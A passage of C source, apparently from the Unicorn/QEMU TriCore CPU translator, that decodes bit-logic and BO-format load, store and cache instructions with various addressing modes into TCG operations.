MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_BIT_SH_NAND_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1] , tcg_ctx->cpu_gpr_d[r2] , pos1, pos2, &tcg_gen_nand_tl); break; case OPC2_32_BIT_SH_ORN_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_orc_tl); break; case OPC2_32_BIT_SH_XNOR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_eqv_tl); break; case OPC2_32_BIT_SH_XOR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], 1); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], temp); tcg_temp_free(tcg_ctx, temp); } /* BO-format */ static void decode_bo_addrmode_post_pre_base(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int32_t r1, r2; TCGv temp; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); switch (op2) { case OPC2_32_BO_CACHEA_WI_SHORTOFF: case OPC2_32_BO_CACHEA_W_SHORTOFF: case OPC2_32_BO_CACHEA_I_SHORTOFF: /* instruction to access the cache */ break; case OPC2_32_BO_CACHEA_WI_POSTINC: case OPC2_32_BO_CACHEA_W_POSTINC: case OPC2_32_BO_CACHEA_I_POSTINC: /* instruction to access the cache, but we still need to handle the addressing mode */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_CACHEA_WI_PREINC: case OPC2_32_BO_CACHEA_W_PREINC: case OPC2_32_BO_CACHEA_I_PREINC: /* instruction to access the cache, but we still need to handle the addressing mode */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_CACHEI_WI_SHORTOFF: case OPC2_32_BO_CACHEI_W_SHORTOFF: if (!has_feature(ctx, TRICORE_FEATURE_131)) { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_BO_CACHEI_W_POSTINC: case OPC2_32_BO_CACHEI_WI_POSTINC: if (has_feature(ctx, TRICORE_FEATURE_131)) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_BO_CACHEI_W_PREINC: case OPC2_32_BO_CACHEI_WI_PREINC: if (has_feature(ctx, TRICORE_FEATURE_131)) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_BO_ST_A_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LESL); break; case OPC2_32_BO_ST_A_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_A_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LESL); break; case OPC2_32_BO_ST_B_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_UB); break; case OPC2_32_BO_ST_B_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_B_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_UB); break; case OPC2_32_BO_ST_D_SHORTOFF: CHECK_REG_PAIR(r1); gen_offset_st_2regs(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_D_POSTINC: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_D_PREINC: CHECK_REG_PAIR(r1); temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_DA_SHORTOFF: CHECK_REG_PAIR(r1); gen_offset_st_2regs(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_DA_POSTINC: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_DA_PREINC: CHECK_REG_PAIR(r1); temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_H_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_ST_H_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_H_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_ST_Q_SHORTOFF: temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); gen_offset_st(ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_Q_POSTINC: temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_Q_PREINC: temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); gen_st_preincr(ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_ST_W_SHORTOFF: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; case OPC2_32_BO_ST_W_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_ST_W_PREINC: gen_st_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bo_addrmode_bitreverse_circular(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int32_t r1, r2; TCGv temp, temp2, temp3; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_const_i32(tcg_ctx, off10); CHECK_REG_PAIR(r2); tcg_gen_ext16u_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2+1]); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); switch (op2) { case OPC2_32_BO_CACHEA_WI_BR: case OPC2_32_BO_CACHEA_W_BR: case OPC2_32_BO_CACHEA_I_BR: gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_CACHEA_WI_CIRC: case OPC2_32_BO_CACHEA_W_CIRC: case OPC2_32_BO_CACHEA_I_CIRC: gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_A_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_A_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_B_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_B_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_D_BR: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_D_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_DA_BR: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_DA_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_H_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_H_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_Q_BR: tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp, temp2, ctx->mem_idx, MO_LEUW); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_Q_CIRC: tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp, temp2, ctx->mem_idx, MO_LEUW); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_ST_W_BR: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_ST_W_CIRC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } static void decode_bo_addrmode_ld_post_pre_base(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int32_t r1, r2; TCGv temp; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); switch (op2) { case OPC2_32_BO_LD_A_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; case OPC2_32_BO_LD_A_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_A_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; case OPC2_32_BO_LD_B_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_SB); break; case OPC2_32_BO_LD_B_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_SB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_B_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_SB); break; case OPC2_32_BO_LD_BU_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_UB); break; case OPC2_32_BO_LD_BU_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_BU_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_SB); break; case OPC2_32_BO_LD_D_SHORTOFF: CHECK_REG_PAIR(r1); gen_offset_ld_2regs(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_D_POSTINC: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_D_PREINC: CHECK_REG_PAIR(r1); temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_LD_DA_SHORTOFF: CHECK_REG_PAIR(r1); gen_offset_ld_2regs(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_DA_POSTINC: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_DA_PREINC: CHECK_REG_PAIR(r1); temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2], off10); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_BO_LD_H_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LESW); break; case OPC2_32_BO_LD_H_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_H_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LESW); break; case OPC2_32_BO_LD_HU_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_LD_HU_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_HU_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); break; case OPC2_32_BO_LD_Q_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); break; case OPC2_32_BO_LD_Q_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_Q_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); break; case OPC2_32_BO_LD_W_SHORTOFF: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; case OPC2_32_BO_LD_W_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], off10); break; case OPC2_32_BO_LD_W_PREINC: gen_ld_preincr(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], off10, MO_LEUL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bo_addrmode_ld_bitreverse_circular(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t off10; int r1, r2; TCGv temp, temp2, temp3; r1 = MASK_OP_BO_S1D(ctx->opcode); r2 = MASK_OP_BO_S2(ctx->opcode); off10 = MASK_OP_BO_OFF10_SEXT(ctx->opcode); op2 = MASK_OP_BO_OP2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); temp3 = tcg_const_i32(tcg_ctx, off10); CHECK_REG_PAIR(r2); tcg_gen_ext16u_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[r2+1]); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); switch (op2) { case OPC2_32_BO_LD_A_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_A_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_B_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_SB); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_B_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_SB); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_BU_BR: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_BU_CIRC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_UB); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_D_BR: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_D_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case OPC2_32_BO_LD_DA_BR: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp2); gen_helper_br_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1]); break; case OPC2_32_BO_LD_DA_CIRC: CHECK_REG_PAIR(r1); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp2, ctx->mem_idx, MO_LEUL); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2+1], 16); tcg_gen_addi_tl(tcg_ctx, temp, temp, 4); tcg_gen_rem_tl(tcg_ctx, temp, temp, temp2); tcg_gen_add_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_a[r2], temp); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1+1], temp2, ctx->mem_idx, MO_LEUL); gen_helper_circ_update(tcg_ctx, tcg_ctx->cpu_gpr_a[r2+1], tcg_ctx->cpu_gpr_a[r2+1], temp3); break; case 